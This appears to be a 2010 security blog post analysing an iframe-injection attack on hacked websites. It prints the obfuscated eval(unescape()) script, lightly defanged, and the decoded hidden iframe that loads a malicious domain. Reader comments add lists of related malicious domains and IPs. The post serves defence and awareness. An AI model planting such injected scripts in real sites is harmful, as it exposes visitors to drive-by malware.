msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Geezter, Qawfer and Other Malicious Iframes From 121 .156 .57 .184

   29 Sep 10   Filed in Short Attack Reviews, Website exploits

This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML

<s cript>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

This script can be detected by Unmask Parasites.

Once executed, this code injects the following hidden iframe

<i frame src="http://bocpoo.com/?705890" width=1 height=1></iframe>

On Google’s diagnostics pages of infected sites you’ll see words like:

Malicious software is hosted on 2 domain(s), including geezter .com/, bocpoo .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including bocpoo .com/.

This attack uses many different domain names (the script content changes accordingly): artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, minpoo.com, podfer .com, pukfer .com, redpoo .com, verfer.com, iseyh .com. All these domains names point to the IP address 121 .156 .57 .184 – server in South Korea (Korea Telecom). The domains are registered by Igor Nikenin from Rostov na Donu, Russia (this info can be fake)

Preliminary review of hacked sites make me think that this attack uses stolen FTP credentials. Although I don’t have strong evidence at this point, it’s always a good idea to scan computers that have access to hacked websites for malware and then change all site passwords. Refrain from saving passwords in FTP clients and try to use secure protocols (SFTP or FTPS) instead of FTP that transfers passwords in plain text.

If you know more information about this attack please share it in the comments section below.

Related posts:

Reader's Comments (13)

  1. |

    [...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Geezter, Qawfer and Other Malicious Iframes From 12_156 _57_184 – Unmask Parasites blog – http://tinyurl.com/2egr75q [...]

  2. |

    More malicious domains:

    naurup .com
    saspoo .com

  3. |

    Another Ip Address is 121 .156 .57 .185, besides 121 .156 .57 .184. All malicious domains are: artode.com, astnop.com, bawset.com, bedfer.com, bedret.com, bocpoo.com, cedfer.com, cerpoo.com, goapoo.com, kevfer.com, kiwdor.com, lowtip.com, minpoo.com, nunpoo.com, oportwe.com, podfer.com, pukfer.com. qawfer.com, qiamhot.com, redpoo.com, saspoo.com, sedfer.com, sedpoo.com, verfer.com, wasplac.com, wazxer.com, xedfer.com, xedpoo.com, aferup.com, ajirup.com, astped.com, blidhu.com, cutped.com, daiehu.com, dainhu.com, dsionhu.com, eainhu.com, edsinhu.com, exdshu.com, iainhu.com, jikped.com, jorped.com, laarup.com, mokaped.com, naerup.com, naurup.com, nsishu.com, oisrup.com, outped.com, padrup.com, quaped.com, qutped.com, sienhu.com, silrup.com, tivped.com, todped.com, and uaerup.com (IP Address 121.156.57.184), and biawwer.com, nuahnd.com, giaine.com, ksinne.com, ainerg.com, awotbop.com, geezter.com, baaswer.com, liaefr.com, wsinfr.com, aierfr.com, urinoor.com, naieerr.com, hianes.com, siinns.com, hinnws.com, niaekw.com, asonie.com, cdeinaa.com, chutnot.com, deetcor.com, gfinee.com, nasettg.com, neebver.com, nsieew.com, puntbar.com, sinesr.com, switbop.com, xeelpot.com, and zuubnot.com (IP Address 121.156.57.185). I saw that whole list on MalwareURL (malwareurl.com)

  4. |

    Sorry, I meant xetpoo.com, not xedpoo.com.

  5. |

    also from 121.156.57.185: aniess.com, butdt.com, dinwoo.com, einsien.com, gredet.com, horewdt.com, huffdt.com, and geerrge.com.

  6. |

    before aferup.com on the top list (IP 121.156.57.184), I meant to list aedrup.com

  7. |

    also iseyh.com, basyh.com, and cattww.com

  8. |

    New attacks are from 10 .net domains, which are: aeined.net, eadied.net, haeied.net, huaned.net, kaieed.net, laiaed.net, pidied.net, roaaed.net, verred.net, and wodied.net.